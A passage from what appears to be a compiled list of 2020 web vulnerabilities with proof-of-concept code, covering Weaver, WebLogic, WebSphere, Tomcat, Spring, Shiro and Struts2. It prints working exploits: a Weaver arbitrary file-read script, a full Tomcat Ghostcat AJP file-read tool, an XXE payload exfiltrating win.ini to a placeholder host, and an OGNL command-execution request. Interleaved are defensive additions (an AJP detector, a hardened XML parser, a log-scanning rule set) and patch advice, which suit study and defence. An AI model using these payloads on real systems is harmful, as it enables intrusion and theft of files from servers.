            if rsp.status_code == 200:
                # ping's usage text in the body proves the command ran
                if "ping" in rsp.text and "count" in rsp.text and "timeout" in rsp.text:
                    httpResponse = "HTTP Response Status:" + str(rsp.status_code) \
                        + "\nHTTP Response Headers:" + str(rsp.headers) \
                        + "\nHTTP Response Body:\n" + str(rsp.text)

                    return True, httpResponse
            return False
        except Exception as e:
            return False

    10、泛微云桥任意文件读取

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
```python
import requests
import re

def poc(self):
    # Both URLs in the original read /etc/passwd; the "win" variant was evidently never adapted.
    vulUrl_win = self.url + "/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt"
    vulUrl_linux = self.url + "/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt"
    headers = {
        "User-Agent": "Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html)",
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
        'Accept-Language': 'zh-CN,zh;q=0.9',
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    try:
        rsp = requests.get(url=vulUrl_win, verify=False, timeout=5)
        if rsp.status_code == 200:
            if "id" in rsp.text:
                print(rsp.text)
                # The server answers with a JSON document whose "id" is the stored file id.
                match = re.finditer(r"\"id\":\"(?P<var>.+?)\"", rsp.text)
                for m in match:
                    fileId = m.group('var')
                    filePath = self.url + "/file/fileNoLogin/" + fileId
                    filersp = requests.get(url=filePath, verify=False, timeout=5)
                    if "root:x:0:0:root:/root:/bin/bash" in filersp.text:
                        httpResponse = "HTTP Response Status:" + str(filersp.status_code) \
                            + "\nHTTP Response Headers:" + str(filersp.headers) \
                            + "\nHTTP Response Body:\n" + str(filersp.text)
                        print(httpResponse)
                        return True, httpResponse
                    else:
                        return False
            else:
                return False
        else:
            rsp = requests.get(url=vulUrl_linux, verify=False, timeout=5)
            if "id" in rsp.text:
                print(rsp.text)
                match = re.finditer(r"\"id\":\"(?P<var>.+?)\"", rsp.text)
                for m in match:
                    fileId = m.group('var')
                    filePath = self.url + "/file/fileNoLogin/" + fileId
                    filersp = requests.get(url=filePath, verify=False, timeout=5)
                    # Original tested `"root:x" in filersp` (the Response object); the body is filersp.text.
                    if "root:x" in filersp.text and ":0:0:root:/root:/bin/bash" in filersp.text:
                        httpResponse = "HTTP Response Status:" + str(filersp.status_code) \
                            + "\nHTTP Response Headers:" + str(filersp.headers) \
                            + "\nHTTP Response Body:\n" + str(filersp.text)
                        print(httpResponse)
                        return True, httpResponse
                    else:
                        return False
            else:
                return False
    except Exception as e:
        return False
```

Reference: xray

III. Middleware / Containers

1. WebLogic command execution vulnerability CVE-2020-14645

Reference: https://my.oschina.net/u/4582816/blog/4436485

2. WebLogic deserialization vulnerability CVE-2020-2551

Reference: https://xz.aliyun.com/t/7725

3. WebLogic deserialization vulnerability CVE-2020-2555

Reference: https://www.secpulse.com/archives/140207.html

4. WebSphere remote code execution vulnerability CVE-2020-4450

Reference: https://lucifaer.com/2020/08/21/WebSphere%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%EF%BC%88CVE-2020-4450%EF%BC%89/

5. WebSphere remote code execution vulnerability CVE-2020-4362

Reference: https://xz.aliyun.com/t/8248?page=5

6. WebSphere XXE (external entity injection) vulnerability CVE-2020-4643

The XML is as follows:

```xml
<!DOCTYPE x [
<!ENTITY % aaa SYSTEM "file:///C:/Windows/win.ini">
<!ENTITY % bbb SYSTEM "http://yourip:8000/xx.dtd">
%bbb;
]>
<definitions name="HelloService" xmlns="http://schemas.xmlsoap.org/wsdl/">
&ddd;
</definitions>
```

xx.dtd is as follows:

```dtd
<!ENTITY % ccc '<!ENTITY ddd &#39;<import namespace="uri" location="http://yourip:8000/xxeLog?%aaa;"/>&#39;>'>%ccc;
```

Reference: https://paper.seebug.org/1342/

7. Apache Tomcat file inclusion vulnerability CVE-2020-1938

Note: February vulnerability

```python
#!/usr/bin/env python
#CNVD-2020-10487 Tomcat-Ajp lfi
#by ydhcui
# Note: this script is written for Python 2 (str/bytes mixing, makefile(bufsize=),
# str.encode('base64')); it does not run unchanged on Python 3.
import struct

# Some references:
# https://tomcat.apache.org/connectors-doc/ajp/ajpv13a.html
def pack_string(s):
    # AJP string: 2-byte length, bytes, trailing NUL; None is encoded as length -1 (0xFFFF)
    if s is None:
        return struct.pack(">h", -1)
    l = len(s)
    return struct.pack(">H%dsb" % l, l, s.encode('utf8'), 0)
def unpack(stream, fmt):
    size = struct.calcsize(fmt)
    buf = stream.read(size)
    return struct.unpack(fmt, buf)
def unpack_string(stream):
    size, = unpack(stream, ">h")
    if size == -1: # null string
        return None
    res, = unpack(stream, "%ds" % size)
    stream.read(1) # \0
    return res
class NotFoundException(Exception):
    pass
class AjpBodyRequest(object):
    # server == web server, container == servlet
    SERVER_TO_CONTAINER, CONTAINER_TO_SERVER = range(2)
    MAX_REQUEST_LENGTH = 8186
    def __init__(self, data_stream, data_len, data_direction=None):
        self.data_stream = data_stream
        self.data_len = data_len
        self.data_direction = data_direction
    def serialize(self):
        data = self.data_stream.read(AjpBodyRequest.MAX_REQUEST_LENGTH)
        if len(data) == 0:
            return struct.pack(">bbH", 0x12, 0x34, 0x00)
        else:
            res = struct.pack(">H", len(data))
            res += data
        if self.data_direction == AjpBodyRequest.SERVER_TO_CONTAINER:
            header = struct.pack(">bbH", 0x12, 0x34, len(res))
        else:
            header = struct.pack(">bbH", 0x41, 0x42, len(res))
        return header + res
    def send_and_receive(self, socket, stream):
        while True:
            data = self.serialize()
            socket.send(data)
            r = AjpResponse.receive(stream)
            while r.prefix_code != AjpResponse.GET_BODY_CHUNK and r.prefix_code != AjpResponse.SEND_HEADERS:
                r = AjpResponse.receive(stream)

            if r.prefix_code == AjpResponse.SEND_HEADERS or len(data) == 4:
                break
class AjpForwardRequest(object):
    _, OPTIONS, GET, HEAD, POST, PUT, DELETE, TRACE, PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, UNLOCK, ACL, REPORT, VERSION_CONTROL, CHECKIN, CHECKOUT, UNCHECKOUT, SEARCH, MKWORKSPACE, UPDATE, LABEL, MERGE, BASELINE_CONTROL, MKACTIVITY = range(28)
    REQUEST_METHODS = {'GET': GET, 'POST': POST, 'HEAD': HEAD, 'OPTIONS': OPTIONS, 'PUT': PUT, 'DELETE': DELETE, 'TRACE': TRACE}
    # server == web server, container == servlet
    SERVER_TO_CONTAINER, CONTAINER_TO_SERVER = range(2)
    # well-known request headers, encoded as 0xA001.. in list order
    COMMON_HEADERS = ["SC_REQ_ACCEPT",
        "SC_REQ_ACCEPT_CHARSET", "SC_REQ_ACCEPT_ENCODING", "SC_REQ_ACCEPT_LANGUAGE", "SC_REQ_AUTHORIZATION",
        "SC_REQ_CONNECTION", "SC_REQ_CONTENT_TYPE", "SC_REQ_CONTENT_LENGTH", "SC_REQ_COOKIE", "SC_REQ_COOKIE2",
        "SC_REQ_HOST", "SC_REQ_PRAGMA", "SC_REQ_REFERER", "SC_REQ_USER_AGENT"
    ]
    # request attributes, encoded as 0x01.. in list order; 0x0A (req_attribute) carries a name/value pair
    ATTRIBUTES = ["context", "servlet_path", "remote_user", "auth_type", "query_string", "route", "ssl_cert", "ssl_cipher", "ssl_session", "req_attribute", "ssl_key_size", "secret", "stored_method"]
    def __init__(self, data_direction=None):
        self.prefix_code = 0x02
        self.method = None
        self.protocol = None
        self.req_uri = None
        self.remote_addr = None
        self.remote_host = None
        self.server_name = None
        self.server_port = None
        self.is_ssl = None
        self.num_headers = None
        self.request_headers = None
        self.attributes = None
        self.data_direction = data_direction
    def pack_headers(self):
        self.num_headers = len(self.request_headers)
        res = ""
        res = struct.pack(">h", self.num_headers)
        for h_name in self.request_headers:
            if h_name.startswith("SC_REQ"):
                code = AjpForwardRequest.COMMON_HEADERS.index(h_name) + 1
                res += struct.pack("BB", 0xA0, code)
            else:
                res += pack_string(h_name)

            res += pack_string(self.request_headers[h_name])
        return res

    def pack_attributes(self):
        res = b""
        for attr in self.attributes:
            a_name = attr['name']
            code = AjpForwardRequest.ATTRIBUTES.index(a_name) + 1
            res += struct.pack("b", code)
            if a_name == "req_attribute":
                aa_name, a_value = attr['value']
                res += pack_string(aa_name)
                res += pack_string(a_value)
            else:
                res += pack_string(attr['value'])
        res += struct.pack("B", 0xFF)
        return res
    def serialize(self):
        res = ""
        res = struct.pack("bb", self.prefix_code, self.method)
        res += pack_string(self.protocol)
        res += pack_string(self.req_uri)
        res += pack_string(self.remote_addr)
        res += pack_string(self.remote_host)
        res += pack_string(self.server_name)
        res += struct.pack(">h", self.server_port)
        res += struct.pack("?", self.is_ssl)
        res += self.pack_headers()
        res += self.pack_attributes()
        if self.data_direction == AjpForwardRequest.SERVER_TO_CONTAINER:
            header = struct.pack(">bbh", 0x12, 0x34, len(res))
        else:
            header = struct.pack(">bbh", 0x41, 0x42, len(res))
        return header + res
    def parse(self, raw_packet):
        # never called by this script; StringIO is not imported
        stream = StringIO(raw_packet)
        self.magic1, self.magic2, data_len = unpack(stream, "bbH")
        self.prefix_code, self.method = unpack(stream, "bb")
        self.protocol = unpack_string(stream)
        self.req_uri = unpack_string(stream)
        self.remote_addr = unpack_string(stream)
        self.remote_host = unpack_string(stream)
        self.server_name = unpack_string(stream)
        self.server_port = unpack(stream, ">h")
        self.is_ssl = unpack(stream, "?")
        self.num_headers, = unpack(stream, ">H")
        self.request_headers = {}
        for i in range(self.num_headers):
            code, = unpack(stream, ">H")
            if code > 0xA000:
                h_name = AjpForwardRequest.COMMON_HEADERS[code - 0xA001]
            else:
                h_name = unpack(stream, "%ds" % code)
                stream.read(1) # \0
            h_value = unpack_string(stream)
            self.request_headers[h_name] = h_value
    def send_and_receive(self, socket, stream, save_cookies=False):
        res = []
        i = socket.sendall(self.serialize())
        if self.method == AjpForwardRequest.POST:
            return res

        r = AjpResponse.receive(stream)
        assert r.prefix_code == AjpResponse.SEND_HEADERS
        res.append(r)
        if save_cookies and 'Set-Cookie' in r.response_headers:
            self.headers['SC_REQ_COOKIE'] = r.response_headers['Set-Cookie']

        # read body chunks and end response packets
        while True:
            r = AjpResponse.receive(stream)
            res.append(r)
            if r.prefix_code == AjpResponse.END_RESPONSE:
                break
            elif r.prefix_code == AjpResponse.SEND_BODY_CHUNK:
                continue
            else:
                raise NotImplementedError
                break

        return res

class AjpResponse(object):
    _,_,_,SEND_BODY_CHUNK, SEND_HEADERS, END_RESPONSE, GET_BODY_CHUNK = range(7)
    COMMON_SEND_HEADERS = [
        "Content-Type", "Content-Language", "Content-Length", "Date", "Last-Modified",
        "Location", "Set-Cookie", "Set-Cookie2", "Servlet-Engine", "Status", "WWW-Authenticate"
    ]
    def parse(self, stream):
        # read headers
        self.magic, self.data_length, self.prefix_code = unpack(stream, ">HHb")

        if self.prefix_code == AjpResponse.SEND_HEADERS:
            self.parse_send_headers(stream)
        elif self.prefix_code == AjpResponse.SEND_BODY_CHUNK:
            self.parse_send_body_chunk(stream)
        elif self.prefix_code == AjpResponse.END_RESPONSE:
            self.parse_end_response(stream)
        elif self.prefix_code == AjpResponse.GET_BODY_CHUNK:
            self.parse_get_body_chunk(stream)
        else:
            raise NotImplementedError

    def parse_send_headers(self, stream):
        self.http_status_code, = unpack(stream, ">H")
        self.http_status_msg = unpack_string(stream)
        self.num_headers, = unpack(stream, ">H")
        self.response_headers = {}
        for i in range(self.num_headers):
            code, = unpack(stream, ">H")
            if code <= 0xA000: # custom header
                h_name, = unpack(stream, "%ds" % code)
                stream.read(1) # \0
                h_value = unpack_string(stream)
            else:
                h_name = AjpResponse.COMMON_SEND_HEADERS[code-0xA001]
                h_value = unpack_string(stream)
            self.response_headers[h_name] = h_value

    def parse_send_body_chunk(self, stream):
        self.data_length, = unpack(stream, ">H")
        self.data = stream.read(self.data_length+1)

    def parse_end_response(self, stream):
        self.reuse, = unpack(stream, "b")

    def parse_get_body_chunk(self, stream):
        rlen, = unpack(stream, ">H")
        return rlen

    @staticmethod
    def receive(stream):
        r = AjpResponse()
        r.parse(stream)
        return r

import socket

def prepare_ajp_forward_request(target_host, req_uri, method=AjpForwardRequest.GET):
    fr = AjpForwardRequest(AjpForwardRequest.SERVER_TO_CONTAINER)
    fr.method = method
    fr.protocol = "HTTP/1.1"
    fr.req_uri = req_uri
    fr.remote_addr = target_host
    fr.remote_host = None
    fr.server_name = target_host
    fr.server_port = 80
    fr.request_headers = {
        'SC_REQ_ACCEPT': 'text/html',
        'SC_REQ_CONNECTION': 'keep-alive',
        'SC_REQ_CONTENT_LENGTH': '0',
        'SC_REQ_HOST': target_host,
        'SC_REQ_USER_AGENT': 'Mozilla',
        'Accept-Encoding': 'gzip, deflate, sdch',
        'Accept-Language': 'en-US,en;q=0.5',
        'Upgrade-Insecure-Requests': '1',
        'Cache-Control': 'max-age=0'
    }
    fr.is_ssl = False
    fr.attributes = []
    return fr

class Tomcat(object):
    def __init__(self, target_host, target_port):
        self.target_host = target_host
        self.target_port = target_port

        self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.socket.connect((target_host, target_port))
        self.stream = self.socket.makefile("rb", bufsize=0)

    def perform_request(self, req_uri, headers={}, method='GET', user=None, password=None, attributes=[]):
        self.req_uri = req_uri
        self.forward_request = prepare_ajp_forward_request(self.target_host, self.req_uri, method=AjpForwardRequest.REQUEST_METHODS.get(method))
        print("Getting resource at ajp13://%s:%d%s" % (self.target_host, self.target_port, req_uri))
        if user is not None and password is not None:
            self.forward_request.request_headers['SC_REQ_AUTHORIZATION'] = "Basic " + ("%s:%s" % (user, password)).encode('base64').replace('\n', '')
        for h in headers:
            self.forward_request.request_headers[h] = headers[h]
        for a in attributes:
            self.forward_request.attributes.append(a)
        responses = self.forward_request.send_and_receive(self.socket, self.stream)
        if len(responses) == 0:
            return None, None
        snd_hdrs_res = responses[0]
        data_res = responses[1:-1]
        if len(data_res) == 0:
            print("No data in response. Headers:%s\n" % snd_hdrs_res.response_headers)
        return snd_hdrs_res, data_res

'''
javax.servlet.include.request_uri
javax.servlet.include.path_info
javax.servlet.include.servlet_path
'''

import argparse
parser = argparse.ArgumentParser()
parser.add_argument("target", type=str, help="Hostname or IP to attack")
parser.add_argument('-p', '--port', type=int, default=8009, help="AJP port to attack (default is 8009)")
parser.add_argument("-f", '--file', type=str, default='WEB-INF/web.xml', help="file path :(WEB-INF/web.xml)")
args = parser.parse_args()
t = Tomcat(args.target, args.port)
_,data = t.perform_request('/asdf',attributes=[
    {'name':'req_attribute','value':['javax.servlet.include.request_uri','/']},
    {'name':'req_attribute','value':['javax.servlet.include.path_info',args.file]},
    {'name':'req_attribute','value':['javax.servlet.include.servlet_path','/']},
])
print('----------------------------')
print("".join([d.data for d in data]))
```
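As an added, defender-side counterpart to the PoC above (this is not part of the original script, nor Tomcat code), the following Python parses the AJP13 Forward Request packet that such a script sends and flags the `javax.servlet.include.*` request attributes that turn an AJP request into an arbitrary file read from the web application. A sensor in front of port 8009, or an offline check over captured AJP traffic, can apply the same logic. The packet builder at the bottom exists only to construct test input; the host names and addresses in it (`app.example`, `10.0.0.5`) are made up.

```python
import struct

# Well-known request-header codes 0xA001..0xA00E, in the order fixed by the AJP13 spec
# (the same order as the SC_REQ_* list in the PoC above).
COMMON_REQUEST_HEADERS = ["accept", "accept-charset", "accept-encoding", "accept-language",
                          "authorization", "connection", "content-type", "content-length",
                          "cookie", "cookie2", "host", "pragma", "referer", "user-agent"]
# Request-attribute codes; 0x0A (req_attribute) carries an arbitrary name/value pair.
ATTRIBUTE_NAMES = {1: "context", 2: "servlet_path", 3: "remote_user", 4: "auth_type",
                   5: "query_string", 6: "route", 7: "ssl_cert", 8: "ssl_cipher",
                   9: "ssl_session", 10: "req_attribute", 11: "ssl_key_size",
                   12: "secret", 13: "stored_method"}
REQ_ATTRIBUTE = 10
# Attributes that make Tomcat serve the request as a servlet include of an arbitrary
# path inside the web application; these are what the CVE-2020-1938 PoC above sets.
INCLUDE_ATTRIBUTES = {"javax.servlet.include.request_uri",
                      "javax.servlet.include.path_info",
                      "javax.servlet.include.servlet_path"}


class AjpParseError(ValueError):
    pass


def _read_string(buf, pos):
    """AJP string: 2-byte big-endian length, bytes, trailing NUL; length 0xFFFF means null."""
    (length,) = struct.unpack_from(">H", buf, pos)
    pos += 2
    if length == 0xFFFF:
        return None, pos
    value = buf[pos:pos + length].decode("utf-8", "replace")
    return value, pos + length + 1


def parse_forward_request(packet):
    """Parse a server->container Forward Request; return (req_uri, headers, attributes)."""
    if len(packet) < 5 or packet[:2] != b"\x12\x34":
        raise AjpParseError("not a server->container AJP packet")
    (length,) = struct.unpack_from(">H", packet, 2)
    body = packet[4:4 + length]
    if len(body) != length:
        raise AjpParseError("truncated AJP packet")
    if body[0] != 0x02:
        raise AjpParseError("prefix 0x%02x is not a Forward Request" % body[0])
    pos = 2                                   # prefix code + method byte
    _protocol, pos = _read_string(body, pos)
    req_uri, pos = _read_string(body, pos)
    for _ in range(3):                        # remote_addr, remote_host, server_name
        _, pos = _read_string(body, pos)
    pos += 3                                  # server_port (2 bytes) + is_ssl (1 byte)
    (num_headers,) = struct.unpack_from(">H", body, pos)
    pos += 2
    headers = {}
    for _ in range(num_headers):
        (code,) = struct.unpack_from(">H", body, pos)
        if code & 0xFF00 == 0xA000:           # well-known header: no name string follows
            idx = (code & 0xFF) - 1
            if 0 <= idx < len(COMMON_REQUEST_HEADERS):
                name = COMMON_REQUEST_HEADERS[idx]
            else:
                name = "sc_req_%02x" % (code & 0xFF)
            pos += 2
        else:                                 # custom header: the 2 bytes are a string length
            name, pos = _read_string(body, pos)
        value, pos = _read_string(body, pos)
        headers[name] = value
    attributes = []
    while pos < len(body):
        code = body[pos]
        pos += 1
        if code == 0xFF:                      # request terminator
            break
        if code == REQ_ATTRIBUTE:
            name, pos = _read_string(body, pos)
        else:
            name = ATTRIBUTE_NAMES.get(code, "unknown_0x%02x" % code)
        value, pos = _read_string(body, pos)
        attributes.append((name, value))
    return req_uri, headers, attributes


def find_include_attributes(packet):
    """Names/values of javax.servlet.include.* attributes in the packet (empty if none)."""
    _, _, attributes = parse_forward_request(packet)
    return [(n, v) for n, v in attributes if n in INCLUDE_ATTRIBUTES]


def is_ghostcat_attempt(packet):
    """True when a Forward Request smuggles servlet-include attributes in from outside."""
    return bool(find_include_attributes(packet))


def _ajp_string(s):
    b = s.encode("utf-8")
    return struct.pack(">H", len(b)) + b + b"\x00"


def build_sample_packet(req_uri, req_attributes):
    """Constructed test input only: a minimal GET Forward Request with the given attributes."""
    body = bytes([0x02, 0x02])                # Forward Request, method GET
    body += _ajp_string("HTTP/1.1") + _ajp_string(req_uri)
    body += _ajp_string("10.0.0.5") + struct.pack(">H", 0xFFFF) + _ajp_string("app.example")
    body += struct.pack(">H?", 8080, False)   # server_port, is_ssl
    body += struct.pack(">H", 1) + struct.pack(">BB", 0xA0, 0x0B) + _ajp_string("app.example")
    for name, value in req_attributes:
        body += bytes([REQ_ATTRIBUTE]) + _ajp_string(name) + _ajp_string(value)
    body += b"\xff"
    return b"\x12\x34" + struct.pack(">H", len(body)) + body
```

Detection is a stop-gap; the fix for this CVE is on the Tomcat side. Tomcat 9.0.31, 8.5.51 and 7.0.100 changed the AJP connector defaults to bind to the loopback address and to require a shared secret (`secretRequired="true"`); on older versions, disable the AJP connector in `server.xml` if nothing in front of Tomcat uses it, otherwise bind it to 127.0.0.1 and configure a secret.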

8. Apache Tomcat session persistence remote code execution vulnerability CVE-2020-9484

Reference: https://blog.csdn.net/xuandao_ahfengren/article/details/106937171 https://xz.aliyun.com/t/7803#toc-1

9. Nginx with LemonLDAP::NG authorization bypass CVE-2020-24660

IV. Frameworks

JAVA:

1. Spring MVC RFD (Reflected File Download) vulnerability CVE-2020-5398

```http
GET /?filename=sample.sh%22%3B&contents=%23!%2Fbin%2Fbash%0Awhoami%27%20--dump-header%20- HTTP/1.1
Host: 192.168.248.129:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
```

Reference: https://www.cnblogs.com/Sylon/p/12700849.html

2. Spring Framework reflected file download vulnerability CVE-2020-5421

Reference: https://xz.aliyun.com/t/8341?page=5

https://mp.weixin.qq.com/s?__biz=MzUyMzczNzUyNQ==&mid=2247495382&idx=3&sn=21e43c186df31d9df263d211b4af208a&chksm=fa3aae0ccd4d271a3e848e6ad5820a3867c1a2e1f7376af12aadb0b946d5814c548f7f1e01ac&scene=0&xtrack=1#rd

3. Spring-Cloud-Config-Server directory traversal CVE-2020-5410

```text
http://ip:8889/flag.txt%23/222/..%28_%29..%28_%29..%28_%29..%28_%29..%28_%29..%28_%29..%28_%29tmp%28_%29
```

Reference: https://xz.aliyun.com/t/7877

4. Spring Cloud Netflix Hystrix Dashboard SSRF

```text
/proxy.stream?origin=http://www.baidu.com
```

5. Apache Cocoon XML injection CVE-2020-11991

```xml
<?xml version="1.0" ?>
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
<userInfo>
<firstName>John</firstName>
<lastName>&ent;</lastName>
</userInfo>
```

Reference: https://www.cnblogs.com/Yang34/p/13665674.html
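Both XXE entries in this list (WebSphere CVE-2020-4643 in section III and Apache Cocoon CVE-2020-11991 above) depend on the parser honouring a DOCTYPE that declares entities. The following Python is an added example for the defending side, not code from this page or from either project: it parses untrusted XML with the standard-library expat parser and refuses any DOCTYPE, and any external entity reference, before a single entity can be declared. The sample documents are constructed to mirror the payload shapes quoted on this page; the host name `attacker.invalid` is a placeholder.

```python
import xml.parsers.expat


class UnsafeXMLError(ValueError):
    """Raised when untrusted XML carries a DOCTYPE or an external entity reference."""


def parse_untrusted_xml(data):
    """Parse XML from an untrusted source and return the element names in document order.

    Any DOCTYPE (internal subset, external DTD, or a parameter-entity trick such as
    %bbb; above) aborts the parse before any entity is declared; a reference to an
    external entity is refused as well.
    """
    parser = xml.parsers.expat.ParserCreate()
    seen = []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXMLError("DOCTYPE %r refused: untrusted XML may not declare entities" % name)

    def on_external_entity(context, base, sysid, pubid):
        raise UnsafeXMLError("external entity %r refused" % (sysid,))

    def on_start(name, attrs):
        seen.append(name)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_entity
    parser.StartElementHandler = on_start
    parser.Parse(data, True)
    return seen


def xml_is_safe(data):
    """True if the document parses without any DTD or entity use, False otherwise."""
    try:
        parse_untrusted_xml(data)
        return True
    except (UnsafeXMLError, xml.parsers.expat.ExpatError):
        return False


# Constructed samples, shaped like the payloads quoted on this page.
BENIGN_XML = b"<userInfo><firstName>John</firstName><lastName>Doe</lastName></userInfo>"

XXE_INTERNAL_ENTITY = (
    b'<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>'
    b"<userInfo><firstName>John</firstName><lastName>&ent;</lastName></userInfo>"
)

XXE_PARAMETER_ENTITY = (
    b'<!DOCTYPE x [<!ENTITY % bbb SYSTEM "http://attacker.invalid/xx.dtd">%bbb;]>'
    b'<definitions name="HelloService">&ddd;</definitions>'
)

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_XML),
                       ("internal entity", XXE_INTERNAL_ENTITY),
                       ("parameter entity", XXE_PARAMETER_ENTITY)):
        print("%-17s safe=%s" % (label, xml_is_safe(doc)))
```

The Java equivalent for the JAXP/Xerces parsers used by WebSphere and Cocoon is to enable the `http://apache.org/xml/features/disallow-doctype-decl` feature and disable external general and parameter entities, which is the standard OWASP XXE hardening; rejecting the DOCTYPE outright is simpler than trying to filter individual entity declarations.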

6. Apache Shiro authorization bypass vulnerability CVE-2020-13933

7. Apache Shiro authentication bypass vulnerability CVE-2020-11989

```text
http://localhost:8080/;/admin/index
http://localhost:8080/admin/index/
```

Reference: https://xz.aliyun.com/t/7964

8. Apache Dubbo remote code execution vulnerability CVE-2020-11995

9. Apache Dubbo deserialization vulnerability CVE-2020-1948

10. Apache Dubbo deserialization vulnerability CVE-2019-1756

11. Struts2 remote code execution vulnerability CVE-2019-0230

poc1:

```text
http://ip:port/test-S2-059.action?payload=%25%7b%31%2b%34%7d%0a
```

poc2:

```http
POST /s2_059/index.action HTTP/1.1
Host: localhost:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 606
Origin: http://localhost:8085
Connection: close
Referer: http://localhost:8085/s2_059_war/
Cookie: JSESSIONID=272825C954147516F847095B055202B5; JSESSIONID=01F82222F5CCED3DC9B7819AE6C98DA0
Upgrade-Insecure-Requests: 1

payload=%25%7b%23_memberAccess.allowPrivateAccess%3Dtrue%2C%23_memberAccess.allowStaticMethodAccess%3Dtrue%2C%23_memberAccess.excludedClasses%3D%23_memberAccess.acceptProperties%2C%23_memberAccess.excludedPackageNamePatterns%3D%23_memberAccess.acceptProperties%2C%23res%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23a%3D%40java.lang.Runtime%40getRuntime()%2C%23s%3Dnew%20java.util.Scanner(%23a.exec('ls%20-al').getInputStream()).useDelimiter('%5C%5C%5C%5CA')%2C%23str%3D%23s.hasNext()%3F%23s.next()%3A''%2C%23res.print(%23str)%2C%23res.close()%0A%7d
```

Reference: https://paper.seebug.org/1331/
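Several entries in this section are single request URIs (the Spring Cloud Config `..(_)` traversal, the Hystrix Dashboard `proxy.stream` SSRF, the Shiro `/;` path bypass, the Struts OGNL `%{...}` payload) and the Weaver 泛微云桥 file read in section II is one as well (`downloadUrl=file://`). The following Python is an added example from the defending side, not code from this page or from any of the affected projects: it scans access-log lines for those request shapes, matching both the raw request target and its URL-decoded form, and reports which rule fired. The log lines are constructed; rule names are made up for this example.

```python
import re
from urllib.parse import unquote

# Each rule is (name, pattern). Rules run against the raw request target AND its
# once-decoded form: the Shiro ';' segment is visible raw, while OGNL '%{' and the
# '(_)' traversal only appear after decoding.
RULES = [
    ("shiro-semicolon-path-bypass",   re.compile(r"/;")),
    ("spring-cloud-config-traversal", re.compile(r"\.\.\(_\)")),
    ("hystrix-proxy-stream-ssrf",     re.compile(r"^/proxy\.stream\?(?:.*&)?origin=https?://", re.I)),
    ("ognl-expression-in-parameter",  re.compile(r"=[^&]*[%$]\{")),
    ("file-scheme-in-parameter",      re.compile(r"=file:/", re.I)),
]

# Common/combined log format: ... "METHOD target HTTP/x.y" ...
LOG_REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def scan_request_target(target):
    """Return the names of all rules matching a request target (path plus query string)."""
    decoded = unquote(target)
    return [name for name, pattern in RULES
            if pattern.search(target) or pattern.search(decoded)]


def scan_access_log(lines):
    """Scan log lines; return one finding per line on which at least one rule matched."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = LOG_REQUEST.search(line)
        if not m:
            continue
        hits = scan_request_target(m.group("target"))
        if hits:
            findings.append({"line": lineno, "method": m.group("method"),
                             "target": m.group("target"), "rules": hits})
    return findings


# Constructed sample log (client 10.0.0.9 and the timestamps are invented); the request
# targets are the ones quoted on this page.
SAMPLE_ACCESS_LOG = [
    '10.0.0.9 - - [05/Oct/2020:09:00:01 +0800] "GET /index.html HTTP/1.1" 200 512',
    '10.0.0.9 - - [05/Oct/2020:09:00:02 +0800] "GET /;/admin/index HTTP/1.1" 200 2048',
    '10.0.0.9 - - [05/Oct/2020:09:00:03 +0800] "GET /flag.txt%23/222/..%28_%29..%28_%29..%28_%29tmp%28_%29 HTTP/1.1" 200 31',
    '10.0.0.9 - - [05/Oct/2020:09:00:04 +0800] "GET /proxy.stream?origin=http://www.baidu.com HTTP/1.1" 200 9000',
    '10.0.0.9 - - [05/Oct/2020:09:00:05 +0800] "GET /test-S2-059.action?payload=%25%7b%31%2b%34%7d%0a HTTP/1.1" 200 77',
    '10.0.0.9 - - [05/Oct/2020:09:00:06 +0800] "GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt HTTP/1.1" 200 60',
]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_ACCESS_LOG):
        print("line %(line)d %(method)s %(target)s -> %(rules)s" % f)
```

Two caveats for anyone turning this into a production rule: `/;` also appears in legitimate `;jsessionid=` path parameters, so that rule needs an allow-list or a check on what follows the semicolon, and a single `unquote` does not catch double-encoded input, so decode until the string stops changing (with a bound) if the application stack is known to decode more than once.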

12. Jackson multiple deserialization vulnerabilities CVE-2020-24616

13. Fastjson <= 1.2.68 remote command execution vulnerability

PHP

1. ThinkPHP 3.x injection vulnerability

2. ThinkPHP 6 arbitrary file operation vulnerability

Note: old vulnerability from January 2020

```http
POST /tp6/public/index.php/index/test1 HTTP/1.1
Host: 127.0.0.1
